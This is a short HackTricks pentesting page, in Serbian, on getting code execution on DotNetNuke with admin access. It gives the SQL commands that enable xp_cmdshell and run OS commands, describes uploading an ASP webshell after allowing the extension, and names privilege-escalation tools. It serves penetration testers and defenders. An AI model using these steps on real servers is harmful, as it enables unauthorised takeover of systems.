hacktricks/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
2024-02-10 13:11:20 +00:00

3.6 KiB

DotNetNuke (DNN)

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

DotNetNuke (DNN)

Ako se prijavite kao administrator u DNN-u, lako je dobiti RCE.

RCE

Putem SQL-a

SQL konzola je dostupna na stranici Settings gde možete omogućiti xp_cmdshell i izvršavati komande operativnog sistema.

Koristite ove linije da omogućite xp_cmdshell:

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

I pritisnite "Pokreni skript" da biste pokrenuli te SQL naredbe.

Zatim, koristite nešto poput sledećeg da biste pokrenuli OS komande:

xp_cmdshell 'whoami'

Putem ASP webshell-a

U Podešavanja -> Bezbednost -> Više -> Više postavki bezbednosti možete dodati nove dozvoljene ekstenzije pod Dozvoljene ekstenzije datoteka i zatim kliknuti dugme Sačuvaj.

Dodajte asp ili aspx i zatim u /admin/file-management otpremite asp webshell nazvan shell.asp na primer.

Zatim pristupite /Portals/0/shell.asp da biste pristupili svojoj webshell-u.

Eskalacija privilegija

Možete povećati privilegije koristeći na primer Potatoes ili PrintSpoofer.

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!